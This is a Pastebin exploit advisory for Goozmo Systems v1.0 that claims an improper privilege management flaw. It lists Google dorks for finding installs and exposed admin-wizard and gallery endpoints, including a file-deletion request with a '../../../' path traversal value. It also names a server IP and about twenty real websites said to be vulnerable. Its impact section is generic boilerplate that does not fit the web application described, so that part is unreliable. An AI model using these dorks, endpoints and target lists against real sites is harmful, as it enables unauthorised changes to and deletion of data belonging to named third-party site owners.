API tools faq
paste
Advertisement
KingSkrupellos

Goozmo™ Systems v.1.0 Improper Privilege Management

KingSkrupellos
Jan 30th, 2019
148
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.62 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Goozmo™ Systems v.1.0 Improper Privilege Management
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 30/01/2019
  7. # Vendor Homepage : goozmo.com
  8. # Software Information Link : goozmo.com/about-goozmo/
  9. # Software Version : 1.0
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : intext:''Goozmo™ Systems - v.1.0''
  14. intext:©2000-2018 Goozmo™ Inc, All rights reserved.
  15. www.goozmo.com | Printed on Recycled Data™
  16. intext:© 2000 – 2019 Goozmo, Inc + Denver, Colorado Design,
  17. Strategy, Development, and Fun + Printed on Recycled Data™
  18. # Vulnerability Type : CWE-269 [ Improper Privilege Management ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22. # Reference Link : cxsecurity.com/issue/WLB-2019010282
  23.  
  24. ####################################################################
  25.  
  26. # Description about Software :
  27. ***************************
  28.  
  29. Goozmo Systems is the agency of web designers, web developers and fanatics of web apps.
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. ***********
  35.  
  36. * The following versions of Goozmo™ Systems, a software management platform,
  37.  
  38. are affected : Goozmo™ Systems v.1.0
  39.  
  40. * This software Goozmo™ Systems v.1.0 does not properly assign, modify,
  41.  
  42. track, or check privileges for an actor, creating an unintended sphere of control for that actor.
  43.  
  44. * Successful exploitation of this vulnerability could allow authenticated
  45.  
  46. system users to escalate their privileges under certain conditions.
  47.  
  48. * Authenticated, non-administrative local users are able to alter service
  49.  
  50. executables with escalated privileges which could allow an attacker to
  51.  
  52. execute arbitrary code under the context of the current system services.
  53.  
  54. Note : New installation of websites and one attacker has administrational authorization.
  55.  
  56. Note : If you add a note to one website - all websites affects at the same time.
  57.  
  58. ####################################################################
  59.  
  60. # Privelege Escalation/Improper Privilege Management Exploit :
  61. ******************************************************
  62. /goowizard/step_one.php
  63.  
  64. /goowizard/step_two.php
  65.  
  66. /goowizard/step_three.php
  67.  
  68. /goowizard/step_four.php
  69.  
  70. /goowizard/step_five.php
  71.  
  72. /goopages/pages_downloadgallery/addfile.php
  73.  
  74. /goopages/pages_downloadgallery/index.php
  75.  
  76. /goopages/pages_downloadgallery/addfile.php?edit=1&id=[ID-NUMBER]&galleryid=1
  77.  
  78. /file_archive/file_archive.php?user_id=&site_id=&file_spot=imgthree
  79.  
  80. /goopages/pages_downloadgallery/deletefile.php?id=[ID-NUMBER]&filename=[FILENAME]&image=../../../[FILENAME]
  81.  
  82. ####################################################################
  83.  
  84. # Example Vulnerable Sites :
  85. *************************
  86.  
  87. Note : Vulnerable IP Address => (104.196.11.136)
  88.  
  89. There are 191 domains hosted on this server.
  90.  
  91. [+] 10170orchidreserve.com/goopages/pages_downloadgallery/index.php =>
  92.  
  93. [ Proof of Concept ] => archive.is/DQUj9
  94.  
  95. [+] synergisticbuildingtechnologies.com/goowizard/step_one.php
  96.  
  97. [+] springerscustomcycles.com/goowizard/step_two.php
  98.  
  99. [+] artworkspottery.com/goowizard/step_three.php
  100.  
  101. [+] architecturalpartnership.com/goowizard/step_four.php
  102.  
  103. [+] anaturalbliss.com/goowizard/step_five.php
  104.  
  105. [+] 7480marshcove.com/goopages/pages_downloadgallery/addfile.php
  106.  
  107. [+] 6441riverpointeway.com/goopages/pages_downloadgallery/addfile.php
  108.  
  109. [+] threeiguanasbelize.com/goopages/pages_downloadgallery/addfile.php
  110.  
  111. [+] 2175ibisisleroad.com/goopages/pages_downloadgallery/addfile.php
  112.  
  113. [+] 2128milanocourt.com/goopages/pages_downloadgallery/addfile.php
  114.  
  115. [+] 13401oakmeade.com/goopages/pages_downloadgallery/addfile.php
  116.  
  117. [+] 13361marshlanding.com/goopages/pages_downloadgallery/addfile.php
  118.  
  119. [+] 13201marshlanding.com/goopages/pages_downloadgallery/addfile.php
  120.  
  121. [+] 13181oakmeade.com/goopages/pages_downloadgallery/addfile.php
  122.  
  123. [+] 13081sabalchase.com/goopages/pages_downloadgallery/addfile.php
  124.  
  125. [+] 13061sabalchase.com/goopages/pages_downloadgallery/addfile.php
  126.  
  127. [+] 13001brynwood.com/goopages/pages_downloadgallery/addfile.php
  128.  
  129. [+] 12981brynwood.com/goopages/pages_downloadgallery/addfile.php
  130.  
  131. [+] caninecampovers.com/goopages/pages_downloadgallery/addfile.php
  132.  
  133. ####################################################################
  134.  
  135. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  136.  
  137. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!